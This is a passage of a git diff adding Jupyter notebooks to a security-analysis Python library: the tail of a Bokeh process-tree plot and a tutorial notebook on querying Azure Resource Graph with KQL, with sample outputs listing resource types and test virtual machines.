",\"type\":\"BoxAnnotation\"}},\"id\":\"1087\",\"type\":\"BoxZoomTool\"},{\"attributes\":{},\"id\":\"1025\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1088\",\"type\":\"SaveTool\"},{\"attributes\":{\"active_drag\":\"auto\",\"active_inspect\":\"auto\",\"active_multi\":null,\"active_scroll\":\"auto\",\"active_tap\":\"auto\",\"tools\":[{\"id\":\"1024\",\"type\":\"PanTool\"},{\"id\":\"1025\",\"type\":\"ResetTool\"},{\"id\":\"1026\",\"type\":\"SaveTool\"},{\"id\":\"1027\",\"type\":\"TapTool\"},{\"id\":\"1033\",\"type\":\"HoverTool\"}]},\"id\":\"1028\",\"type\":\"Toolbar\"},{\"attributes\":{\"text\":\"ProcessTree\"},\"id\":\"1004\",\"type\":\"Title\"},{\"attributes\":{\"below\":[{\"id\":\"1075\",\"type\":\"LinearAxis\"}],\"center\":[{\"id\":\"1079\",\"type\":\"Grid\"},{\"id\":\"1084\",\"type\":\"Grid\"}],\"left\":[{\"id\":\"1080\",\"type\":\"LinearAxis\"}],\"plot_height\":700,\"plot_width\":90,\"renderers\":[{\"id\":\"1102\",\"type\":\"GlyphRenderer\"}],\"title\":{\"id\":\"1127\",\"type\":\"Title\"},\"toolbar\":{\"id\":\"1091\",\"type\":\"Toolbar\"},\"x_range\":{\"id\":\"1067\",\"type\":\"DataRange1d\"},\"x_scale\":{\"id\":\"1071\",\"type\":\"LinearScale\"},\"y_range\":{\"id\":\"1069\",\"type\":\"Range1d\"},\"y_scale\":{\"id\":\"1073\",\"type\":\"LinearScale\"}},\"id\":\"1066\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"axis_line_color\":{\"value\":null},\"formatter\":{\"id\":\"1151\",\"type\":\"BasicTickFormatter\"},\"major_label_standoff\":0,\"major_tick_line_color\":{\"value\":\"navy\"},\"ticker\":{\"id\":\"1062\",\"type\":\"FixedTicker\"},\"visible\":false},\"id\":\"1014\",\"type\":\"LinearAxis\"},{\"attributes\":{},\"id\":\"1071\",\"type\":\"LinearScale\"},{\"attributes\":{\"range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"value\":0.25},\"id\":\"1056\",\"type\":\"Dodge\"},{\"attributes\":{\"text\":{\"field\":\"PID\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1055\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1056\",\"type\":\"Dodge\"}}},\"id\":\"1058\",\"type\":\"Text\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"TimeGenerated\":\"datetime\"},\"renderers\":[{\"id\":\"1039\",\"type\":\"GlyphRenderer\"}],\"tooltips\":[[\"Process\",\"@NewProcessName\"],[\"PID\",\"@PID\"],[\"CmdLine\",\"@CommandLine\"],[\"SubjUser\",\"@SubjectUserName\"],[\"SubjLgnId\",\"@SubjectLogonId\"],[\"TargLgnId\",\"@TargetLogonId\"],[\"Time\",\"@TimeGenerated{%F %T}\"]]},\"id\":\"1033\",\"type\":\"HoverTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#1f77b4\"},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1035\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1038\",\"type\":\"Rect\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":1.75},\"id\":\"1035\",\"type\":\"Dodge\"},{\"attributes\":{\"callback\":null,\"end\":19,\"start\":-1},\"id\":\"1069\",\"type\":\"Range1d\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1047\",\"type\":\"CDSView\"},{\"attributes\":{\"range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"value\":-0.2},\"id\":\"1042\",\"type\":\"Dodge\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1041\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1042\",\"type\":\"Dodge\"}}},\"id\":\"1044\",\"type\":\"Text\"},{\"attributes\":{\"grid_line_alpha\":0.1,\"grid_line_color\":\"navy\",\"minor_grid_line_alpha\":0.1,\"minor_grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1064\",\"type\":\"FixedTicker\"}},\"id\":\"1018\",\"type\":\"Grid\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1044\",\"type\":\"Text\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1045\",\"type\":\"Text\"},\"selection_glyph\":null,\"view\":{\"id\":\"1047\",\"type\":\"CDSView\"}},\"id\":\"1046\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"ticks\":[1,2,3]},\"id\":\"1064\",\"type\":\"FixedTicker\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.6},\"fill_color\":{\"value\":\"navy\"},\"height\":{\"units\":\"data\",\"value\":0.95},\"line_color\":{\"value\":\"#1f77b4\"},\"width\":{\"units\":\"data\",\"value\":3.5},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1035\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\"}},\"id\":\"1037\",\"type\":\"Rect\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":0.1},\"id\":\"1048\",\"type\":\"Dodge\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1048\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1049\",\"type\":\"Dodge\"}}},\"id\":\"1051\",\"type\":\"Text\"},{\"attributes\":{\"callback\":null},\"id\":\"1027\",\"type\":\"TapTool\"},{\"attributes\":{\"range\":{\"id\":\"1008\",\"type\":\"Range1d\"},\"value\":0.25},\"id\":\"1049\",\"type\":\"Dodge\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1054\",\"type\":\"CDSView\"},{\"attributes\":{\"text\":{\"field\":\"Exe\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"8pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1048\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1049\",\"type\":\"Dodge\"}}},\"id\":\"1052\",\"type\":\"Text\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":1.8},\"id\":\"1055\",\"type\":\"Dodge\"},{\"attributes\":{\"range\":{\"id\":\"1006\",\"type\":\"Range1d\"},\"value\":0.1},\"id\":\"1041\",\"type\":\"Dodge\"},{\"attributes\":{},\"id\":\"1012\",\"type\":\"LinearScale\"},{\"attributes\":{\"data_source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"},\"glyph\":{\"id\":\"1037\",\"type\":\"Rect\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1038\",\"type\":\"Rect\"},\"selection_glyph\":null,\"view\":{\"id\":\"1040\",\"type\":\"CDSView\"}},\"id\":\"1039\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"source\":{\"id\":\"1002\",\"type\":\"ColumnDataSource\"}},\"id\":\"1040\",\"type\":\"CDSView\"},{\"attributes\":{\"callback\":null,\"end\":19,\"start\":-2},\"id\":\"1008\",\"type\":\"Range1d\"},{\"attributes\":{},\"id\":\"1010\",\"type\":\"LinearScale\"},{\"attributes\":{\"axis_line_color\":{\"value\":null},\"formatter\":{\"id\":\"1149\",\"type\":\"BasicTickFormatter\"},\"major_label_standoff\":0,\"major_tick_line_color\":{\"value\":\"navy\"},\"ticker\":{\"id\":\"1020\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1019\",\"type\":\"LinearAxis\"},{\"attributes\":{\"callback\":null},\"id\":\"1067\",\"type\":\"DataRange1d\"},{\"attributes\":{},\"id\":\"1026\",\"type\":\"SaveTool\"},{\"attributes\":{\"dimension\":1,\"grid_line_color\":\"navy\",\"ticker\":{\"id\":\"1020\",\"type\":\"BasicTicker\"},\"visible\":false},\"id\":\"1023\",\"type\":\"Grid\"},{\"attributes\":{\"text\":{\"field\":\"cmd\"},\"text_alpha\":{\"value\":0.1},\"text_baseline\":\"middle\",\"text_color\":{\"value\":\"black\"},\"text_font_size\":{\"value\":\"7pt\"},\"x\":{\"field\":\"Level\",\"transform\":{\"id\":\"1041\",\"type\":\"Dodge\"}},\"y\":{\"field\":\"Row\",\"transform\":{\"id\":\"1042\",\"type\":\"Dodge\"}}},\"id\":\"1045\",\"type\":\"Text\"}],\"root_ids\":[\"1124\"]},\"title\":\"Bokeh Application\",\"version\":\"1.3.4\"}};\n  var render_items = [{\"docid\":\"4eec22b6-251a-4358-b905-989e6c838545\",\"roots\":{\"1124\":\"59d1e9f2-7c95-4e5b-bac3-d7d8b7489c99\"}}];\n  root.Bokeh.embed.embed_items_notebook(docs_json, render_items);\n\n  }\n  if (root.Bokeh !== undefined) {\n    embed_document(root);\n  } else {\n    var attempts = 0;\n    var timer = setInterval(function(root) {\n      if (root.Bokeh !== undefined) {\n        embed_document(root);\n        clearInterval(timer);\n      }\n      attempts++;\n      if (attempts > 100) {\n        console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        clearInterval(timer);\n      }\n    }, 10, root)\n  }\n})(window);",
+        "application/vnd.bokehjs_exec.v0+json": ""
+       },
+       "metadata": {
+        "application/vnd.bokehjs_exec.v0+json": {
+         "id": "1124"
+        }
+       },
+       "output_type": "display_data"
+      }
+     ],
+     "persistentId": "86f9303d-6c99-4344-99a8-4eaa99cfd414",
+     "text": "ptplot.plot_tree(p_tree_leg)"
+    },
+    "executionTime": "2019-12-13T22:48:42.411Z"
+   }
+  ],
+  "interpreter": {
+   "hash": "b736adfe05d9ae282eea4c01a733d58a0215ef3399d39339e6557e4c515b0f48"
+  },
+  "kernelspec": {
+   "display_name": "Python 3.7.10 64-bit (conda)",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.9.7"
+  },
+  "latex_envs": {
+   "LaTeX_envs_menu_present": true,
+   "autoclose": false,
+   "autocomplete": true,
+   "bibliofile": "biblio.bib",
+   "cite_by": "apalike",
+   "current_citInitial": 1,
+   "eqLabelWithNumbers": true,
+   "eqNumInitial": 1,
+   "hotkeys": {
+    "equation": "Ctrl-E",
+    "itemize": "Ctrl-I"
+   },
+   "labels_anchors": false,
+   "latex_user_defs": false,
+   "report_style_numbering": false,
+   "user_envs_cfg": false
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {},
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": true,
+   "toc_position": {},
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "uuid": "ab38641e-21c4-4605-b546-f908997c72b5",
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
diff --git a/docs/notebooks/ResourceGraphDriver.ipynb b/docs/notebooks/ResourceGraphDriver.ipynb
new file mode 100644
index 000000000..0de014244
--- /dev/null
+++ b/docs/notebooks/ResourceGraphDriver.ipynb
@@ -0,0 +1,915 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "id": "a5f54665-3f32-4d04-abd8-6cfa2386a322",
+   "metadata": {},
+   "source": [
+    "# Resource Graph Explorer Data Provider\n",
+    "\n",
+    "## Description\n",
+    "This data provider allows for a connection to the [Azure Resource Graph](https://docs.microsoft.com/azure/governance/resource-graph/overview) and a way to query against the [Azure Resource Graph Explorer](https://docs.microsoft.com/azure/governance/resource-graph/first-query-portal). The data connector functions in the same way as other data connectors and uses the Kusto Query Language (KQL) and has with some subtle differences to other connectors in they way that authentication is handled.\n",
+    "\n",
+    "You would use this data connector to flexibly and quickly get details on deployed Azure resources within a subscription. It allows for bulk queries on various aspects of resources and returns data in a very structured format. This makes it much more effective and efficient than getting resource specific details via the resource API.\n",
+    "\n",
+    "More details about data providers in MSTICPy can be found in [the documentation](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html)\n",
+    "\n",
+    "### Installation\n",
+    "Installation of this data connector requires that MSTICPy be installed with the Azure extras:\n",
+    "`pip install msticpy['azure']`\n",
+    "\n",
+    "### Initialization\n",
+    "The provider for the Azure Resource Graph is named `ResourceGraph`\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "id": "83457852-f9b1-42b6-895e-7102be7c0db5",
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "from msticpy.data.data_providers import QueryProvider\n",
+    "qry_prov = QueryProvider(\"ResourceGraph\")"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "id": "51a2e987-b940-4b05-bf18-034210028628",
+   "metadata": {},
+   "source": [
+    "### Authentication\n",
+    "Once initialized the first step in using the data provider is to authenticate. The Resource Graph provider uses MSTICPy's [Azure authentication features](https://msticpy.readthedocs.io/en/latest/data_acquisition/AzureData.html?highlight=azure#instantiating-and-connecting-with-an-azure-data-connector) and you can provide a set of authentication methods when connecting. By default the provider will attempt to authenticate using credentials stored in msticpyconfig.yaml (or as environment variables) and an Azure CLI connection but this can be customized with the 'auth_methods' keyword.<br>\n",
+    "\n",
+    "If storing details in msticpyconfig.yaml they must be under the `AzureCLI` DataProviders section - for more details see [this documentation](https://msticpy.readthedocs.io/en/latest/getting_started/msticpyconfig.html).\n",
+    "\n",
+    "Once successfully connected you will be presented with a \"Connected\" message.\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "id": "399f8801-2ee5-4bd7-a037-e3ab9968d70c",
+   "metadata": {},
+   "outputs": [
+    {
+     "name": "stdout",
+     "output_type": "stream",
+     "text": [
+      "Connected\n"
+     ]
+    }
+   ],
+   "source": [
+    "qry_prov.connect(auth_methods=[\"cli\"])"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "id": "d7497d92-183e-4ed8-b35b-ec97e8122c53",
+   "metadata": {},
+   "source": [
+    "## Listing available queries\n",
+    "As with other data providers there are a number of built-in queries with this provider. Once connected you can view the available queries with `QUERY_PROVIDER.list_queries()`.\n",
+    "\n",
+    "Alternatively you can view query details in an interactive widget with `QUERY_PROVIDER.browse_queries()`\n",
+    "\n",
+    "For more information, refer documentation : [Listing available queries](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html#listing-available-queries)."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 19,
+   "id": "a7da0ae6-b14d-49f6-ab40-d143d74ecc68",
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "application/vnd.jupyter.widget-view+json": {
+       "model_id": "5a10e2d1d1d3481691eeaf9cc9420080",
+       "version_major": 2,
+       "version_minor": 0
+      },
+      "text/plain": [
+       "VBox(children=(Text(value='', description='Filter:', style=DescriptionStyle(description_width='initial')), Sel…"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<hr>"
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "<h3>Retrieves list of VMs with network details</h3><div></div><p><b>Parameters</b></p><div>add_query_items: str (optional)</div><div style='margin-left: 40px'>    Additional query clauses</div><div>host_name: str (optional)</div><div style='margin-left: 40px'>    A hostname to filter on</div><div>table: str (optional)</div><div style='margin-left: 40px'>    Table name</div><div style='margin-left: 40px'>    (default value is: resources)</div><br><p><b>Query</b></p><pre>{table} \n",
+       "| where type =~ \"microsoft.compute/virtualmachines\" \n",
+       "| where name contains \"{host_name}\" \n",
+       "| extend nics=array_length(properties.networkProfile.networkInterfaces) \n",
+       "| mv-expand nic=properties.networkProfile.networkInterfaces \n",
+       "| where nics == 1 or nic.properties.primary =~ \"true\" or isempty(nic) \n",
+       "| project vmId = id, vmName = name,\n",
+       "  vmSize=tostring(properties.hardwareProfile.vmSize), nicId =\n",
+       "  tostring(nic.id)\n",
+       "| join kind=leftouter ( Resources \n",
+       "| where type =~ \"microsoft.network/networkinterfaces\" \n",
+       "| extend ipConfigsCount=array_length(properties.ipConfigurations) \n",
+       "| mv-expand ipconfig=properties.ipConfigurations \n",
+       "| where ipConfigsCount == 1 or ipconfig.properties.primary =~ \"true\" \n",
+       "| project nicId = id, publicIpId =\n",
+       "  tostring(ipconfig.properties.publicIPAddress.id)) on nicId\n",
+       "| project-away nicId1 \n",
+       "| summarize by vmId, vmName, vmSize, nicId, publicIpId \n",
+       "| join kind=leftouter ( Resources \n",
+       "| where type =~ \"microsoft.network/publicipaddresses\" \n",
+       "| project publicIpId = id, publicIpAddress = properties.ipAddress) on publicIpId \n",
+       "| project-away publicIpId1 {add_query_items}</pre><br>\n",
+       "        <p><b>Example</b></p>\n",
+       "        <p>{QueryProvider}[.QueryPath].QueryName(params...)</p>\n",
+       "        <pre>qry_prov.ResourceGraph.list_detailed_virtual_machines(start=start, end=end, hostname=host)</pre>\n",
+       "    "
+      ],
+      "text/plain": [
+       "<IPython.core.display.HTML object>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "qry_prov.browse_queries()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "id": "c7bb7896-296f-45e3-b211-b4fc35e15bc2",
+   "metadata": {},
+   "source": [
+    "## Running pre-defined query\n",
+    "In order to run pre-defined query, execute with the query name, e.g. `QUERY_PROVIDER.ResoruceGraph.QUERY_NAME()`. You can pass parameters to these queries to customize them, however they will also run with default parameters if none as provider. The query browser will provide details as to what parameters are avaliable with each query.\n",
+    "\n",
+    "As with other data providers data is returned to you in a Pandas DataFrame.\n",
+    "\n",
+    "For more information , refer documentation - [Running an pre-defined query](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html#running-an-pre-defined-query)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 20,
+   "id": "e852f7f5-501c-4122-ac09-7594a38751e9",
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>type</th>\n",
+       "      <th>apiVersion</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>microsoft.alertsmanagement/actionrules</td>\n",
+       "      <td>2019-05-05-preview</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>microsoft.alertsmanagement/smartdetectoralertr...</td>\n",
+       "      <td>2021-04-01</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>microsoft.apimanagement/service</td>\n",
+       "      <td>2019-12-01</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>3</th>\n",
+       "      <td>microsoft.automanage/accounts</td>\n",
+       "      <td>2020-06-30-preview</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>4</th>\n",
+       "      <td>microsoft.automation/automationaccounts</td>\n",
+       "      <td>2018-06-30</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>...</th>\n",
+       "      <td>...</td>\n",
+       "      <td>...</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>161</th>\n",
+       "      <td>microsoft.web/serverfarms</td>\n",
+       "      <td>2020-10-01</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>162</th>\n",
+       "      <td>microsoft.web/sites</td>\n",
+       "      <td>2019-08-01</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>163</th>\n",
+       "      <td>microsoft.web/sites/slots</td>\n",
+       "      <td>2019-08-01</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>164</th>\n",
+       "      <td>microsoft.web/staticsites</td>\n",
+       "      <td>2019-12-01-preview</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>165</th>\n",
+       "      <td>sendgrid.email/accounts</td>\n",
+       "      <td>2015-01-01</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>166 rows × 2 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                  type          apiVersion\n",
+       "0               microsoft.alertsmanagement/actionrules  2019-05-05-preview\n",
+       "1    microsoft.alertsmanagement/smartdetectoralertr...          2021-04-01\n",
+       "2                      microsoft.apimanagement/service          2019-12-01\n",
+       "3                        microsoft.automanage/accounts  2020-06-30-preview\n",
+       "4              microsoft.automation/automationaccounts          2018-06-30\n",
+       "..                                                 ...                 ...\n",
+       "161                          microsoft.web/serverfarms          2020-10-01\n",
+       "162                                microsoft.web/sites          2019-08-01\n",
+       "163                          microsoft.web/sites/slots          2019-08-01\n",
+       "164                          microsoft.web/staticsites  2019-12-01-preview\n",
+       "165                            sendgrid.email/accounts          2015-01-01\n",
+       "\n",
+       "[166 rows x 2 columns]"
+      ]
+     },
+     "execution_count": 20,
+     "metadata": {},
+     "output_type": "execute_result"
+    }
+   ],
+   "source": [
+    "qry_prov.ResourceGraph.list_resources_by_api_version()"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "id": "862952b2-d631-4759-a9aa-5135ebfa43bc",
+   "metadata": {},
+   "source": [
+    "### Running an ad-hoc query\n",
+    "You can also define a your own KQL query for the Resource Graph and run with `QUERY_PROVIDER.exec_query(QUERY)`\n",
+    "\n",
+    "For more information, see the documentation on [Running an Ad-hoc Query](https://msticpy.readthedocs.io/en/latest/data_acquisition/DataProviders.html#running-an-ad-hoc-query)"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 33,
+   "id": "1a7fbec9-8ca4-4f00-ad09-3c0aedff310e",
+   "metadata": {},
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th>id</th>\n",
+       "      <th>name</th>\n",
+       "      <th>type</th>\n",
+       "      <th>tenantId</th>\n",
+       "      <th>kind</th>\n",
+       "      <th>location</th>\n",
+       "      <th>resourceGroup</th>\n",
+       "      <th>subscriptionId</th>\n",
+       "      <th>managedBy</th>\n",
+       "      <th>sku</th>\n",
+       "      <th>...</th>\n",
+       "      <th>tags.azsecpack</th>\n",
+       "      <th>identity.userAssignedIdentities./subscriptions/8eebd9ad-e271-4989-a796-d60c57655743/resourceGroups/AzSecPackAutoConfigRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/AzSecPackAutoConfigUA-eastus2.principalId</th>\n",
+       "      <th>identity.userAssignedIdentities./subscriptions/8eebd9ad-e271-4989-a796-d60c57655743/resourceGroups/AzSecPackAutoConfigRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/AzSecPackAutoConfigUA-eastus2.clientId</th>\n",
+       "      <th>identity.type</th>\n",
+       "      <th>identity</th>\n",
+       "      <th>properties.storageProfile.osDisk.vhd.uri</th>\n",
+       "      <th>properties.osProfile.windowsConfiguration.patchSettings.patchMode</th>\n",
+       "      <th>properties.osProfile.windowsConfiguration.provisionVMAgent</th>\n",
+       "      <th>properties.osProfile.windowsConfiguration.enableAutomaticUpdates</th>\n",
+       "      <th>properties.diagnosticsProfile.bootDiagnostics.storageUri</th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>0</th>\n",
+       "      <td>/subscriptions/8eebd9ad-e271-4989-a796-d60c576...</td>\n",
+       "      <td>RHEL77Base</td>\n",
+       "      <td>microsoft.compute/virtualmachines</td>\n",
+       "      <td>72f988bf-86f1-41af-91ab-2d7cd011db47</td>\n",
+       "      <td></td>\n",
+       "      <td>eastus2</td>\n",
+       "      <td>linuxtestlab</td>\n",
+       "      <td>8eebd9ad-e271-4989-a796-d60c57655743</td>\n",
+       "      <td></td>\n",
+       "      <td>None</td>\n",
+       "      <td>...</td>\n",
+       "      <td>nonprod</td>\n",
+       "      <td>e660337c-1cc7-4818-b8c8-3f005dbc6f2a</td>\n",
+       "      <td>5fae63c7-985a-4432-9ff2-ef6ff0dc7db6</td>\n",
+       "      <td>UserAssigned</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>1</th>\n",
+       "      <td>/subscriptions/8eebd9ad-e271-4989-a796-d60c576...</td>\n",
+       "      <td>Ubuntu18ASC</td>\n",
+       "      <td>microsoft.compute/virtualmachines</td>\n",
+       "      <td>72f988bf-86f1-41af-91ab-2d7cd011db47</td>\n",
+       "      <td></td>\n",
+       "      <td>eastus2</td>\n",
+       "      <td>linuxtestlab</td>\n",
+       "      <td>8eebd9ad-e271-4989-a796-d60c57655743</td>\n",
+       "      <td></td>\n",
+       "      <td>None</td>\n",
+       "      <td>...</td>\n",
+       "      <td>nonprod</td>\n",
+       "      <td>e660337c-1cc7-4818-b8c8-3f005dbc6f2a</td>\n",
+       "      <td>5fae63c7-985a-4432-9ff2-ef6ff0dc7db6</td>\n",
+       "      <td>UserAssigned</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>2</th>\n",
+       "      <td>/subscriptions/8eebd9ad-e271-4989-a796-d60c576...</td>\n",
+       "      <td>GodzillaTron1</td>\n",
+       "      <td>microsoft.compute/virtualmachines</td>\n",
+       "      <td>72f988bf-86f1-41af-91ab-2d7cd011db47</td>\n",
+       "      <td></td>\n",
+       "      <td>japanwest</td>\n",
+       "      <td>monster-island</td>\n",
+       "      <td>8eebd9ad-e271-4989-a796-d60c57655743</td>\n",
+       "      <td></td>\n",
+       "      <td>None</td>\n",
+       "      <td>...</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>NaN</td>\n",
+       "      <td>https://monsterislanddisks868.blob.core.window...</td>\n",
+       "      <td>AutomaticByOS</td>\n",
+       "      <td>True</td>\n",
+       "      <td>True</td>\n",
+       "      <td>https://monsterislanddiag271.blob.core.windows...</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "<p>3 rows × 58 columns</p>\n",
+       "</div>"
+      ],
+      "text/plain": [
+       "                                                  id           name  \\\n",
+       "0  /subscriptions/8eebd9ad-e271-4989-a796-d60c576...     RHEL77Base   \n",
+       "1  /subscriptions/8eebd9ad-e271-4989-a796-d60c576...    Ubuntu18ASC   \n",
